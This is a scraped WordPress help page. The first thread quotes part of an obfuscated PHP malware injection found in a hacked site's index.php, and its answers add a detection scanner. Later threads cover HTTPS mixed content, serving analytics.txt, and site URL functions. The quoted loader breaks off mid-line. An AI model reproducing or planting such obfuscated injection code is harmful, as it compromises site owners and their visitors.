Wordpress site got hacked - wordpress

My Wordpress site is hacked and the following code is being added into index.php over and over - what should I do?
I have latest version of WP
<?php
$O_00__OO0O='BEGINJ6Pn2HmH0e568SXnR6KRkmP5tQbh7KEW';
$O0OO_0_O0_='balanced4141989';
$O00_0_OOO_=665;
$O0_0__OO0O='rD-BC-G-/F';
$O_000O__OO=1871;
$O_0_0O_OO0=array("perfecti","albuminuria","crusie","hepatocolic","duchesnea","constrainingly","flashtester","astroscopus","anonang","flagellator","diene","microgaster","deceitfully","jerker","bisect","antispreader","burring","landocrat","coletit","aurir");;
$O_0O_O_0O0='facemaker.php';
$O__OO0_O00='T4';
$O_0O0O_0O_=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O_00_O_0OO=$O_0O0O_0O_{26}.$O_0O0O_0O_{6}.$O_0O0O_0O_{10}.$O_0O0O_0O_{30}.$O_0O0O_0O_{29}.$O_0O0O_0O_{26}.$O_0O0O_0O_{30}.$O_0O0O_0O_{38}.$O_0O0O_0O_{6}.$O_0O0O_0O_{18}.$O_0O0O_0O_{23}.$O_0O0O_0O_{10}.$O_0O0O_0O_{29}.$O_0O0O_0O_{10}.$O_0O0O_0O_{12}.$O_0O0O_0O_{5}.$O_0O0O_0O_{30}.$O_0O0O_0O_{2}.$O_0O0O_0O_{35}.$O_0O0O_0O_{0}.$O_0O0O_0O_{30}.$O_0O0O_0O_{29}.$O_0O0O_0O_{33}.$O_0O0O_0O_{30}.$O_0O0O_0O_{10};$O0OO0__0_O=$O_0O0O_0O_{16}.$O_0O0O_0O_{24}.$O_0O0O_0O_{30}.$O_0O0O_0O_{27}.$O_0O0O_0O_{29}.$O_0O0O_0O_{24}.$O_0O0O_0O_{30}.$O_0O0O_0O_{16}.$O_0O0O_0O_{23}.$O_0O0O_0O_{6}.$O_0O0O_0O_{32}.$O_0O0O_0O_{30}.$O_0O0O_0O_{29}.$O_0O0O_0O_{32}.$O_0O0O_0O_{6}.$O_0O0O_0O_{23}.$O_0O0O_0O_{23}.$O_0O0O_0O_{3}.$O_0O0O_0O_{6}.$O_0O0O_0O_{32}.$O_0O0O_0O_{25};$O0_OOO00__=$O_0O0O_0O_{33}.$O_0O0O_0O_{10}.$O_0O0O_0O_{24}.$O_0O0O_0O_{30}.$O_0O0O_0O_{6}.$O_0O0O_0O_{5}.$O_0O0O_0O_{29}.$O_0O0O_0O_{33}.$O_0O0O_0O_{35}.$O_0O0O_0O_{32}.$O_0O0O_0O_{25}.$O_0O0O_0O_{30}.$O_0O0O_0O_{10}.$O_0O0O_0O_{29}.$O_0O0O_0O_{32}.$O_0O0O_0O_{23}.$O_0O0O_0O_{12}.$O_0O0O_0O_{30}.$O_0O0O_0O_{0}.$O_0O0O_0O_{10};$O0OOO_0_0_=$O_0O0O_0O_{33}.$O_0O0O_0O_{10}.$O_0O0O_0O_{24}.$O_0O0O_0O_{30}.$O_0O0O_0O_{6}.

Normally index.php contains the below code in WordPress
<?php
define( 'WP_USE_THEMES', true );
/** Loads the WordPress Environment and Template */
require( dirname( __FILE__ ) . '/wp-blog-header.php' );
Do you have your backup files? If you have, then just replace this index.php
Also, you should add your site to Google Webmaster.
Many of the features of Google Webmaster Search Console can help you identify potential problems. Thank you.
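
Restoring index.php from a backup does not show which other files carry the same code, and the question says the injection returns "over and over". The following added example (not from the original posts) is a small PHP CLI scanner that flags files showing the obfuscation traits of the snippet quoted above; the function names, heuristics and thresholds are assumptions made for illustration.

```php
<?php
// Added example, not from the original posts. The heuristics mirror the
// injected snippet quoted above; the thresholds are assumptions to tune.

function obfuscation_indicators(string $source): array
{
    $checks = [
        // Variable names made only of 'O', '0' and '_'.
        'lookalike-variable-names' => ['/\$[O0_]{8,}\b/', 3],
        // urldecode() of a string literal carrying several percent-escapes.
        'urldecode-alphabet' =>
            ['/urldecode\(\s*["\'][^"\'%]*(?:%[0-9A-Fa-f]{2}[^"\'%]*){5,}/', 1],
        // Function names assembled one character at a time via $var{N}.
        'brace-string-offsets' => ['/\$\w+\{\d+\}/', 3],
    ];
    $hits = [];
    foreach ($checks as $name => [$regex, $min]) {
        if (preg_match_all($regex, $source) >= $min) {
            $hits[] = $name;
        }
    }
    return $hits;
}

// Walk a WordPress tree and report every .php file that trips a heuristic,
// since other files in the tree may carry the same injected code.
function scan_tree(string $root): array
{
    $report = [];
    $files = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($files as $file) {
        if (!$file->isFile() || strtolower($file->getExtension()) !== 'php') {
            continue;
        }
        $hits = obfuscation_indicators((string) file_get_contents($file->getPathname()));
        if ($hits) {
            $report[$file->getPathname()] = $hits;
        }
    }
    return $report;
}

// Constructed, inert sample in the style of the injected code above.
$sample = '<?php $O_00__OO0O0="a";$O0_0_O0O_O0=urldecode("%6E%31%7A%62%2F%6D");'
    . '$O_0O0O_0O_0=$O0_0_O0O_O0{1}.$O0_0_O0O_O0{2}.$O0_0_O0O_O0{3};';
print_r(obfuscation_indicators($sample));
print_r(isset($argv[1]) ? scan_tree($argv[1]) : []);
```

Pass the WordPress root as the first argument to scan a real tree; files it reports should be compared against a clean copy of the same WordPress, theme and plugin release before anything is restored.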

Related

HTTPS Issue With Mixed Content - ARForms Plugin

I have a WordPress site on HTTPS, but I also have mixed content because of the ARForms plugin. PHP 5.6
fonts.googleapis.com and some images in this plugin are insecure, and I can't find those files in the database and template files. Please help me with PHP.
Thank you.
This is what I found in the configuration, and this functionality does not work:
$arfsiteurl = home_url();
if (is_ssl() and ( !preg_match('/^https:\/\/.*\..*$/', $arfsiteurl) or ! preg_match('/^https:\/\/.*\..*$/', WP_PLUGIN_URL))) {
    $arfsiteurl = str_replace('http://', 'https://', $arfsiteurl);
    define('ARFURL', str_replace('http://', 'https://', WP_PLUGIN_URL . '/arforms'));
} else {
    define('ARFURL', WP_PLUGIN_URL . '/arforms');
}
You should try to download these scripts locally and enqueue them with your HTTPS secure server.
As for the plugin scripts, you could also try to install this plugin and click the flush rewrite rules for it to automatically add code into your .htaccess file.

get_template_directory_uri() returns http instead of https on SSL site

I know the topic has been already discussed, but it seems no solution was found. This is my case:
I have a wordpress site which now has SSL. However, in the theme resources are added as follows:
wp_enqueue_script( 'spectrumwp-conditional', get_template_directory_uri() . '/js/vendor/conditional.js', array('jquery'), null, true);
but get_template_directory_uri() returns the url with http not https.
Can you help me to solve this?
Edit:
I added this to my wp-config.php file
$_SERVER['HTTPS']='on';
Links to resources are shown with https:// but instead of, for example
https://www.example.com/wp-content/plugins/...
I have
https://www.example.com/plugins/LayerSlider/...
e.g. wp-content folder is missing
Final update:
uncommenting
define('FORCE_SSL_ADMIN', true);
and adding
if (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && strpos($_SERVER['HTTP_X_FORWARDED_PROTO'], 'https') !== false) {
    $_SERVER['HTTPS'] = 'on';
}
just before the line
/* That's all, stop editing! Happy blogging. */
fixed the problem! Only, I recommend $_SERVER['HTTP_X_FORWARDED_PROTO'] is not used, as it may not be accurate enough.
Solved!
You need to use is_ssl() to check if the site is running https:// or http://
Here is the hook to check and redirect :
function check_if_https() {
    if ( !is_ssl() ) {
        wp_redirect('https://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'], 301 );
        exit();
    }
}
add_action ( 'template_redirect', 'check_if_https', 1 );
Go into Settings -> General and check the Site URL.
It sounds like the problem you're having is this value is still HTTP, not HTTPS. Approach this change with caution. Make sure you have a working backup and a full understanding of why this URL needs to change as well as the impact it will have.
get_template_directory_uri() will automatically provide an HTTPS link when the site URL is set correctly.
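
The "Final update" in the question sets $_SERVER['HTTPS'] from X-Forwarded-Proto, and the poster notes that the header may not be accurate. As an added example (not code from the thread), this sketch accepts the header only when the request arrives from a reverse proxy you operate; the function name, the proxy list and the sample requests are assumptions, and the IP addresses are documentation ranges.

```php
<?php
// Added example, not from the original thread. forwarded_https() and the
// proxy list are assumptions; the IP addresses are documentation ranges.

function forwarded_https(array $server, array $trustedProxies): bool
{
    // TLS terminated by this web server itself.
    if (!empty($server['HTTPS']) && strtolower($server['HTTPS']) !== 'off') {
        return true;
    }
    // Any client can send X-Forwarded-Proto, so accept it only when the
    // TCP peer is a proxy we operate.
    if (!in_array($server['REMOTE_ADDR'] ?? '', $trustedProxies, true)) {
        return false;
    }
    // Exact match instead of strpos(): "nothttps" or "http,https" must fail.
    $proto = strtolower(trim($server['HTTP_X_FORWARDED_PROTO'] ?? ''));
    return $proto === 'https';
}

// In wp-config.php, above the "That's all, stop editing!" line:
//   if (forwarded_https($_SERVER, ['192.0.2.10'])) { $_SERVER['HTTPS'] = 'on'; }

// Constructed requests covering proxied, spoofed, plain and direct cases.
$cases = [
    'via trusted proxy' => ['REMOTE_ADDR' => '192.0.2.10', 'HTTP_X_FORWARDED_PROTO' => 'https'],
    'spoofed header'    => ['REMOTE_ADDR' => '198.51.100.7', 'HTTP_X_FORWARDED_PROTO' => 'https'],
    'proxy, plain http' => ['REMOTE_ADDR' => '192.0.2.10', 'HTTP_X_FORWARDED_PROTO' => 'http'],
    'direct TLS'        => ['REMOTE_ADDR' => '198.51.100.7', 'HTTPS' => 'on'],
];
foreach ($cases as $label => $server) {
    printf("%-18s %s\n", $label, var_export(forwarded_https($server, ['192.0.2.10']), true));
}
```

The proxy in front of the site should overwrite X-Forwarded-Proto rather than append to it, so that a value supplied by the client never reaches PHP.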

Unable to access analytics.txt once uploaded, returns 404

I've been asked to add an analytics.txt file to a wordpress website so I've created the file and uploaded it to the server document root but when I go to it via the url www.examples.com/analytics.txt all I get is a 404 error.
I've checked the file permissions and I've cleared the wordpress cache but neither have helped.
Any ideas?
The folder structure is as follows:
wp-admin
wp-content
wp-includes
analytics.txt <-- added this file, but cannot seem to access it via a web browser
index.php
etc...
This is NOT the solution but it is a work-around while I carry on trying to figure out why wordpress won't allow me to access my file.
So if you're desperate and HAVE to get it sorted right now, here is what you could do, but I warn you, it's ugly! Open your index.php file and you should see something like this:
<?php
define('WP_USE_THEMES', true);
require( dirname( __FILE__ ) . '/wp-blog-header.php' );
?>
Make a backup copy first and then add the wrapping if statement:
<?php
// The array key must be a quoted string; a bare REQUEST_URI is an undefined constant.
if ($_SERVER['REQUEST_URI'] == '/analytics.txt') {
    die('Put the text that you were instructed to put into your analytics.txt file in here');
} else {
    define('WP_USE_THEMES', true);
    require( dirname( __FILE__ ) . '/wp-blog-header.php' );
}
?>
Like I said, this is a dirty solution, but when needs must and the client is getting impatient, this could help in the meantime.
Hoping that someone will have a better solution though!
I was able to get this to work with the following for the Sage theme:
Upload the analytics.txt through the theme administration panel
Copy the url of the upload and remove the hostname. For me it looked like this: app/uploads/2018/09/analytics.txt
Open the functions.php file and add the following:
function analytics_txt_rewrite(){
    add_rewrite_rule('^analytics\.txt$','<route to your analytics.txt file>','top');
}
add_action('init','analytics_txt_rewrite');
Flush and regenerate the rewrite rules database: From WordPress Administration Screens, Select Settings -> Permalinks and just click Save Changes without any changes.

Exact difference between the wordpress address url and the site address url

I am currently fixing a wordpress theme that contains absolute URLs. Example:
$.preloadImages('/wp-content/themes/themeName/img/button.png');
Now I want to prefix the url with something like WP_HOME or WP_SITEURL but I don't know which one to choose. What is the exact difference? In other words, what is the scenario in which the two might differ?
I guess they correspond to the "wordpress address" and the "site address" in the settings. However, the explanation there does not help me.
I would use neither. Use a function instead of a constant get_bloginfo('url'); or get_bloginfo('wpurl');. If you have your wp-content inside of the wordpress install it does not really matter (but I prefer the first).
Take a look at the following functions: content_url(), get_template_directory_uri() (for parent themes) or get_stylesheet_directory_uri() (for themes including child themes). When using these functions you don't rely on one particular directory structure.
In your case I'd use
trailingslashit(get_stylesheet_directory_uri()) . 'img/button.png';
EDIT
WP_SITEURL is your WordPress address (wp_url) and WP_HOME is your blog address (url). By default the wp-content directory is a sibling to wp-admin and wp-includes and both constants have the same value, but you can move it out of there and make use of the WP_CONTENT_FOLDERNAME, WP_CONTENT_DIR and WP_CONTENT_URL constants to move it somewhere else, e.g.
wp-content
index.php
wordpress
|-- wp-admin
|-- wp-includes
now WP_SITEURL will return https://yourdomain.com/wordpress/ and WP_HOME will be https://yourdomain.com/, see https://codex.wordpress.org/Giving_WordPress_Its_Own_Directory for more details of giving WordPress its own directory.
href="<?php echo get_template_directory_uri(); ?>/img/button.png"
so use get_template_directory_uri()
DIFFERENCE
1. get_template_directory();
<?php echo get_template_directory(); ?>
Returns an absolute server path (eg: /home/user/public_html/wp-content/themes/my_theme), not a URI.
2. get_template_directory_uri()
Retrieve theme directory URI.
www.example.com/wp-content/theme/themename/image/image.png
As per your query: if it's for a plugin then use plugin_url, or for a theme get_template_directory_uri()
get_template_directory_uri() . '/js/custom-script.js'
Here are other functions.
SITE URL
The site_url template tag retrieves the site URL for the current site (where the WordPress core files reside) with the appropriate protocol, 'https' if is_ssl() and 'http' otherwise. If scheme is 'http' or 'https', is_ssl() is overridden.
Use this to get the "WordPress address" as defined in general settings. Use home_url() to get the "site address" as defined in general settings.
$url = site_url();
echo $url;
Output: http://www.example.com or http://www.example.com/wordpress
HOME URL
The home_url template tag retrieves the home URL for the current site, optionally with the $path argument appended. The function determines the appropriate protocol,
$url = home_url();
echo $url;
Output: http://www.example.com
So mostly both are similar, not different. You can also use / in both to get / in the output.
BLOG INFO
There is another one: blog info
function bloginfo( $show='' ) {
    echo get_bloginfo( $show, 'display' );
}
<?php bloginfo('url'); ?> It will also return the blog URL.
home_url: It's your home URL for your site.
site_url: Where your WordPress core files are located.
For your use you can use site_url this will work for you.

WordPress update_option - use in a file where the WP files are not included

I'm writing a WP plugin and have an issue.
In the plugin's settings area, there is a form, where the content is sent to a file (save.php) through AJAX.
So, the save.php file has no access to WP's update_option function.
How can I use the option functions in the save.php file?
Thx!
/** Load WordPress Bootstrap */
require_once( dirname( dirname( __FILE__ ) ) . '/wp-load.php' );
